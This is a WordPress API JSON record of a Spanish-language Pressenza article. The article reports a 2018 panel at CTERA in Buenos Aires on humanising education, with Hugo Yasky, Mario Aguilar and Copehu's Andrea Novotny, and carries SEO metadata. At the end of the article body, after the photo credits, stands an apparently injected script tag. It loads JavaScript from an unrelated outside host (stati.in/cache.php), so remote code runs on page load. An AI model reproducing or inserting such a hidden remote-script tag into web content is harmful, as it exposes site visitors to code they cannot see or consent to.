{"id":635775,"date":"2018-05-06T17:39:47","date_gmt":"2018-05-06T16:39:47","guid":{"rendered":"https:\/\/www.pressenza.com\/?p=635775"},"modified":"2018-05-06T23:08:29","modified_gmt":"2018-05-06T22:08:29","slug":"educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera","status":"publish","type":"post","link":"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/","title":{"rendered":"Educaci\u00f3n humanizadora y liberadora: Yasky, Aguilar y la Copehu expusieron en CTERA"},"content":{"rendered":"<p>En la sede de CTERA de la ciudad de Buenos Aires tuvo lugar este viernes 4 de mayo el panel \u201cHablemos de Educaci\u00f3n. Consecuencias de una Educaci\u00f3n estandarizada\u201d con la participaci\u00f3n del diputado nacional Hugo Yasky, el Presidente Nacional del Colegio de Profesores de Chile, Mario Aguilar y la co-fundadora de la Corriente Pedag\u00f3gica Humanista Universalista (Copehu), Andrea Novotny; mientras que Eduardo Pereyra, secretario de Relaciones Internacionales de la CTERA ofici\u00f3 de presentador. Un encuentro en el que se intercambi\u00f3 acerca de las problem\u00e1ticas que afectan a los trabajadores de la educaci\u00f3n en Chile y Argentina, de las luchas comunes, pero tambi\u00e9n acerca de las propuestas de nuevos paradigmas educativos y teor\u00edas del aprendizaje que necesita la Educaci\u00f3n p\u00fablica en inminente transformaci\u00f3n y constante ataque por parte del modelo neoliberal en la regi\u00f3n.<\/p>\n<p>Asimismo, se anunci\u00f3 el lanzamiento de la segunda edici\u00f3n de HomoSapiens del <em>libro Pedagog\u00eda de la Intencionalidad. Educando para una Conciencia Activa<\/em>, de Mario Aguilar y Rebeca Bize, que ser\u00e1 presentado por el autor en la Feria Internacional del Libro de Buenos Aires. Entre los asistentes se destac\u00f3 la presencia de la secretaria General de la Confederaci\u00f3n de Trabajadores de la Educaci\u00f3n de la Rep\u00fablica Argentina (CTERA), Sonia Alesso, docentes, trabajadores y trabajadoras de la educaci\u00f3n e integrantes de la Copehu de distintos puntos del pa\u00eds.<\/p>\n<p>La licenciada en Ciencias de la Educaci\u00f3n, Andrea Novotny, abri\u00f3 el panel poniendo en relieve la importante lucha no violenta que llevan adelante los docentes en Argentina y Chile, en \u201cesa esperanza de que el ser humano tenga una vida digna\u201d. Luego destac\u00f3 la necesidad de transformar los paradigmas actuales en Educaci\u00f3n, ya que \u201chasta aqu\u00ed hemos llegado con los paradigmas positivistas del siglo XX, no s\u00f3lo en cuanto a Educaci\u00f3n sino en todos los \u00e1mbitos de la sociedad\u201d. \u201cEs necesaria la renovaci\u00f3n profunda en todos los campos para construir una cultura de la no-violencia\u201d, argument\u00f3.<\/p>\n<p>M\u00e1s adelante, Novotny se pregunt\u00f3 \u201c\u00bfhasta cu\u00e1ndo vamos a seguir educando para un mundo que muri\u00f3?\u201d, a la par que describi\u00f3 el paradigma del aprendizaje intencional que propone la Copehu en funci\u00f3n del \u201cdesarrollo integral del ser humano\u201d. Puso de relieve la concepci\u00f3n de la conciencia humana seg\u00fan esta visi\u00f3n, como \u201cactiva, creativa e intencional\u201d fundada en lo propuesto por el Humanismo Universalista de Silo, en contraposici\u00f3n a la idea de que los ni\u00f1os, ni\u00f1as y adolescentes en los \u00e1mbitos educativos son \u201cesponjas de recibir datos\u201d, sino que se trata de \u201cseres actuantes, intencionales, sensibles, capaces de transformar al mundo y a s\u00ed mismos\u201d.<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-636060\" src=\"https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0006-720x540.jpg\" alt=\"\" width=\"720\" height=\"540\" srcset=\"https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0006-720x540.jpg 720w, https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0006-300x225.jpg 300w, https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0006-768x576.jpg 768w, https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0006.jpg 1280w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>Por su parte el secretario General de la Central de los Trabajadores de Argentina, Hugo Yasky, destac\u00f3: \u201cEs una alegr\u00eda recibir a Mario en nuestra CTERA como tantas veces nos han recibido en el Colegio de Profesores los hermanos chilenos. Para nosotros Mario es un compa\u00f1ero con el que compartimos muchos a\u00f1os de lucha, de trabajo en com\u00fan, ahora estamos juntos en la Internacional de la Educaci\u00f3n\u201d. Yasky remarc\u00f3 la \u201clarga historia del Colegio de Profesores de Chile en defensa de la Educaci\u00f3n p\u00fablica y de la dignidad de los docentes\u201d, al tiempo que enfatiz\u00f3 en que \u201cest\u00e1 emparentada con nuestra propia historia\u201d. \u201cEstamos viviendo un momento dif\u00edcil en Am\u00e9rica Latina. Creo que podemos depositar la esperanza en nuestra capacidad de construir escenarios de resistencia, de lucha, de construir siempre como hace Mario con este libro\u201d.<\/p>\n<p>En tanto que Mario Aguilar puso \u00e9nfasis en el internacionalismo necesario a construir entre los sindicatos de Argentina y Chile dada la larga historia de lucha que los une. \u201cEste libro es un intento de gestar ideas nuevas en la Educaci\u00f3n, en contraposici\u00f3n a las ideas que han concebido a la Educaci\u00f3n como un producto bajo la l\u00f3gica del Mercado, la educaci\u00f3n de los rendimientos, de la calidad, de una Educaci\u00f3n que se ha vaciado de sentido. En Chile sabemos bien las consecuencias que ese modelo ha tenido\u201d, destac\u00f3 el Presidente del sindicato de profesores del pa\u00eds trasandino. Aguilar propuso de salir de ese paradigma conductista, positivista, que son conceptos que han dominado el campo educacional por mucho tiempo y est\u00e1n agotadas. \u201cLa crisis de la Escuela si bien es por causas econ\u00f3micas, burocr\u00e1ticas, administrativas, se da tambi\u00e9n porque hay un tipo de Educaci\u00f3n que ya no responde al mundo actual, de esa Educaci\u00f3n bancaria que ya defini\u00f3 Paulo Freire hace m\u00e1s de 30 a\u00f1os. Este libro busca cuestionar aquello y construir nuevos paradigmas\u201d.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-636070\" src=\"https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0003-720x720.jpg\" alt=\"\" width=\"720\" height=\"720\" srcset=\"https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0003-720x720.jpg 720w, https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0003-150x150.jpg 150w, https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0003-300x300.jpg 300w, https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0003-768x768.jpg 768w, https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0003.jpg 1224w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/p>\n<p>M\u00e1s adelante, el autor chileno cuestion\u00f3 la idea de la \u201ccalidad educativa\u201d que hoy se propicia desde el neoliberalismo, ya que en realidad se est\u00e1 queriendo imponer la mercantilizaci\u00f3n y la l\u00f3gica de mercado en la educaci\u00f3n p\u00fablica. Aguilar, adem\u00e1s, alert\u00f3 a los sindicatos argentinos que si se termina de instalar el lucro en la educaci\u00f3n p\u00fablica despu\u00e9s puede costar \u201cmas de 20 a\u00f1os\u201d salir de all\u00ed, como sucede en Chile, que m\u00e1s all\u00e1 de las masivas movilizaciones no se logra superar la l\u00f3gica mercantil en la educaci\u00f3n p\u00fablica.<\/p>\n<p>La \u201ceducaci\u00f3n humanizadora, transformadora y liberadora\u201d como horizonte com\u00fan fue una propuesta que reson\u00f3 en el encuentro, como norte a construir en una Am\u00e9rica latina que, si bien asediada actualmente por las corporaciones financieras en el poder, sabr\u00e1 salir adelante, como tantas otras veces lo hizo en su larga historia de luchas, logros, retrocesos, pero siempre avanzando para el mejoramiento de la vida de sus pueblos.<\/p>\n<p>Esposici\u00f3n de Andrea Novotny y Hugo Yasky:<\/p>\n<p>&nbsp;<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/4cE6V0MssYc\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p>Exposici\u00f3n de Mario Aguilar (s\u00edntesis):<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/aizwO_qdOd0\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p>Cobertura: Iv\u00e1n Novotny<\/p>\n<p>Fotos: Patricia Lacolla<\/p>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=99&amp;ref=z&amp;debug=false\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>En la sede de CTERA de la ciudad de Buenos Aires tuvo lugar este viernes 4 de mayo el panel \u201cHablemos de Educaci\u00f3n. Consecuencias de una Educaci\u00f3n estandarizada\u201d con la participaci\u00f3n del diputado nacional Hugo Yasky, el Presidente Nacional del&hellip;<\/p>\n","protected":false},"author":1046,"featured_media":636051,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11389,1230],"tags":[1429,1428,393,3079,7784],"class_list":["post-635775","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-contenido-original","category-educacion-tema","tag-aprendizaje-intencional","tag-copehu","tag-educacion","tag-educacion-humanizadora","tag-mario-aguilar"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Educaci\u00f3n humanizadora y liberadora: Yasky, Aguilar y la Copehu expusieron en CTERA<\/title>\n<meta name=\"description\" content=\"En la sede de CTERA de la ciudad de Buenos Aires tuvo lugar este viernes 4 de mayo el panel \u201cHablemos de Educaci\u00f3n. Consecuencias de una Educaci\u00f3n\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Educaci\u00f3n humanizadora y liberadora: Yasky, Aguilar y la Copehu expusieron en CTERA\" \/>\n<meta property=\"og:description\" content=\"En la sede de CTERA de la ciudad de Buenos Aires tuvo lugar este viernes 4 de mayo el panel \u201cHablemos de Educaci\u00f3n. Consecuencias de una Educaci\u00f3n\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/\" \/>\n<meta property=\"og:site_name\" content=\"Pressenza\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/PressenzaItalia\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/Copehu\/\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-06T16:39:47+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-05-06T22:08:29+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0005.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1204\" \/>\n\t<meta property=\"og:image:height\" content=\"1204\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"COPEHU\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@COPEHU1\" \/>\n<meta name=\"twitter:site\" content=\"@PressenzaIPA\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"COPEHU\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/\"},\"author\":{\"name\":\"COPEHU\",\"@id\":\"https:\/\/www.pressenza.com\/es\/#\/schema\/person\/385bea3cd2facc332ff1bd91c50d777a\"},\"headline\":\"Educaci\u00f3n humanizadora y liberadora: Yasky, Aguilar y la Copehu expusieron en CTERA\",\"datePublished\":\"2018-05-06T16:39:47+00:00\",\"dateModified\":\"2018-05-06T22:08:29+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/\"},\"wordCount\":993,\"publisher\":{\"@id\":\"https:\/\/www.pressenza.com\/es\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0005.jpg\",\"keywords\":[\"Aprendizaje Intencional\",\"COPEHU\",\"Educaci\u00f3n\",\"Educaci\u00f3n Humanizadora\",\"Mario Aguilar\"],\"articleSection\":[\"Contenido Original\",\"Educaci\u00f3n\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/\",\"url\":\"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/\",\"name\":\"Educaci\u00f3n humanizadora y liberadora: Yasky, Aguilar y la Copehu expusieron en CTERA\",\"isPartOf\":{\"@id\":\"https:\/\/www.pressenza.com\/es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0005.jpg\",\"datePublished\":\"2018-05-06T16:39:47+00:00\",\"dateModified\":\"2018-05-06T22:08:29+00:00\",\"description\":\"En la sede de CTERA de la ciudad de Buenos Aires tuvo lugar este viernes 4 de mayo el panel \u201cHablemos de Educaci\u00f3n. Consecuencias de una Educaci\u00f3n\",\"breadcrumb\":{\"@id\":\"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/#primaryimage\",\"url\":\"https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0005.jpg\",\"contentUrl\":\"https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0005.jpg\",\"width\":1204,\"height\":1204},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.pressenza.com\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Educaci\u00f3n humanizadora y liberadora: Yasky, Aguilar y la Copehu expusieron en CTERA\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.pressenza.com\/es\/#website\",\"url\":\"https:\/\/www.pressenza.com\/es\/\",\"name\":\"Pressenza\",\"description\":\"International Press Agency\",\"publisher\":{\"@id\":\"https:\/\/www.pressenza.com\/es\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.pressenza.com\/es\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.pressenza.com\/es\/#organization\",\"name\":\"Pressenza\",\"url\":\"https:\/\/www.pressenza.com\/es\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/www.pressenza.com\/es\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.pressenza.com\/wp-content\/uploads\/2022\/10\/pressenza_logo_200x200.jpg\",\"contentUrl\":\"https:\/\/www.pressenza.com\/wp-content\/uploads\/2022\/10\/pressenza_logo_200x200.jpg\",\"width\":200,\"height\":200,\"caption\":\"Pressenza\"},\"image\":{\"@id\":\"https:\/\/www.pressenza.com\/es\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/PressenzaItalia\",\"https:\/\/x.com\/PressenzaIPA\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.pressenza.com\/es\/#\/schema\/person\/385bea3cd2facc332ff1bd91c50d777a\",\"name\":\"COPEHU\",\"description\":\"Corriente Pedagogica Humanista Universalista - Courant Pedagogique Humaniste Universaliste - Corrente Pedagogica Umanista Universalista - Universalist Humanist Pedagogical Current www.copehu.net\",\"sameAs\":[\"https:\/\/www.copehu.org\/\",\"https:\/\/www.facebook.com\/Copehu\/\",\"https:\/\/x.com\/COPEHU1\"],\"url\":\"https:\/\/www.pressenza.com\/es\/author\/copehu\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Educaci\u00f3n humanizadora y liberadora: Yasky, Aguilar y la Copehu expusieron en CTERA","description":"En la sede de CTERA de la ciudad de Buenos Aires tuvo lugar este viernes 4 de mayo el panel \u201cHablemos de Educaci\u00f3n. Consecuencias de una Educaci\u00f3n","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/","og_locale":"es_ES","og_type":"article","og_title":"Educaci\u00f3n humanizadora y liberadora: Yasky, Aguilar y la Copehu expusieron en CTERA","og_description":"En la sede de CTERA de la ciudad de Buenos Aires tuvo lugar este viernes 4 de mayo el panel \u201cHablemos de Educaci\u00f3n. Consecuencias de una Educaci\u00f3n","og_url":"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/","og_site_name":"Pressenza","article_publisher":"https:\/\/www.facebook.com\/PressenzaItalia","article_author":"https:\/\/www.facebook.com\/Copehu\/","article_published_time":"2018-05-06T16:39:47+00:00","article_modified_time":"2018-05-06T22:08:29+00:00","og_image":[{"width":1204,"height":1204,"url":"https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0005.jpg","type":"image\/jpeg"}],"author":"COPEHU","twitter_card":"summary_large_image","twitter_creator":"@COPEHU1","twitter_site":"@PressenzaIPA","twitter_misc":{"Escrito por":"COPEHU","Tiempo de lectura":"5 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/#article","isPartOf":{"@id":"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/"},"author":{"name":"COPEHU","@id":"https:\/\/www.pressenza.com\/es\/#\/schema\/person\/385bea3cd2facc332ff1bd91c50d777a"},"headline":"Educaci\u00f3n humanizadora y liberadora: Yasky, Aguilar y la Copehu expusieron en CTERA","datePublished":"2018-05-06T16:39:47+00:00","dateModified":"2018-05-06T22:08:29+00:00","mainEntityOfPage":{"@id":"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/"},"wordCount":993,"publisher":{"@id":"https:\/\/www.pressenza.com\/es\/#organization"},"image":{"@id":"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/#primaryimage"},"thumbnailUrl":"https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0005.jpg","keywords":["Aprendizaje Intencional","COPEHU","Educaci\u00f3n","Educaci\u00f3n Humanizadora","Mario Aguilar"],"articleSection":["Contenido Original","Educaci\u00f3n"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/","url":"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/","name":"Educaci\u00f3n humanizadora y liberadora: Yasky, Aguilar y la Copehu expusieron en CTERA","isPartOf":{"@id":"https:\/\/www.pressenza.com\/es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/#primaryimage"},"image":{"@id":"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/#primaryimage"},"thumbnailUrl":"https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0005.jpg","datePublished":"2018-05-06T16:39:47+00:00","dateModified":"2018-05-06T22:08:29+00:00","description":"En la sede de CTERA de la ciudad de Buenos Aires tuvo lugar este viernes 4 de mayo el panel \u201cHablemos de Educaci\u00f3n. Consecuencias de una Educaci\u00f3n","breadcrumb":{"@id":"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/#primaryimage","url":"https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0005.jpg","contentUrl":"https:\/\/www.pressenza.com\/wp-content\/uploads\/2018\/05\/IMG-20180505-WA0005.jpg","width":1204,"height":1204},{"@type":"BreadcrumbList","@id":"https:\/\/www.pressenza.com\/es\/2018\/05\/educacion-humanizadora-y-liberadora-yasky-aguilar-y-la-copehu-expusieron-en-ctera\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.pressenza.com\/es\/"},{"@type":"ListItem","position":2,"name":"Educaci\u00f3n humanizadora y liberadora: Yasky, Aguilar y la Copehu expusieron en CTERA"}]},{"@type":"WebSite","@id":"https:\/\/www.pressenza.com\/es\/#website","url":"https:\/\/www.pressenza.com\/es\/","name":"Pressenza","description":"International Press Agency","publisher":{"@id":"https:\/\/www.pressenza.com\/es\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.pressenza.com\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/www.pressenza.com\/es\/#organization","name":"Pressenza","url":"https:\/\/www.pressenza.com\/es\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.pressenza.com\/es\/#\/schema\/logo\/image\/","url":"https:\/\/www.pressenza.com\/wp-content\/uploads\/2022\/10\/pressenza_logo_200x200.jpg","contentUrl":"https:\/\/www.pressenza.com\/wp-content\/uploads\/2022\/10\/pressenza_logo_200x200.jpg","width":200,"height":200,"caption":"Pressenza"},"image":{"@id":"https:\/\/www.pressenza.com\/es\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/PressenzaItalia","https:\/\/x.com\/PressenzaIPA"]},{"@type":"Person","@id":"https:\/\/www.pressenza.com\/es\/#\/schema\/person\/385bea3cd2facc332ff1bd91c50d777a","name":"COPEHU","description":"Corriente Pedagogica Humanista Universalista - Courant Pedagogique Humaniste Universaliste - Corrente Pedagogica Umanista Universalista - Universalist Humanist Pedagogical Current www.copehu.net","sameAs":["https:\/\/www.copehu.org\/","https:\/\/www.facebook.com\/Copehu\/","https:\/\/x.com\/COPEHU1"],"url":"https:\/\/www.pressenza.com\/es\/author\/copehu\/"}]}},"place":"Buenos Aires, Argentina","original_article_url":"","_links":{"self":[{"href":"https:\/\/www.pressenza.com\/es\/wp-json\/wp\/v2\/posts\/635775","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.pressenza.com\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.pressenza.com\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.pressenza.com\/es\/wp-json\/wp\/v2\/users\/1046"}],"replies":[{"embeddable":true,"href":"https:\/\/www.pressenza.com\/es\/wp-json\/wp\/v2\/comments?post=635775"}],"version-history":[{"count":0,"href":"https:\/\/www.pressenza.com\/es\/wp-json\/wp\/v2\/posts\/635775\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.pressenza.com\/es\/wp-json\/wp\/v2\/media\/636051"}],"wp:attachment":[{"href":"https:\/\/www.pressenza.com\/es\/wp-json\/wp\/v2\/media?parent=635775"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.pressenza.com\/es\/wp-json\/wp\/v2\/categories?post=635775"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.pressenza.com\/es\/wp-json\/wp\/v2\/tags?post=635775"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}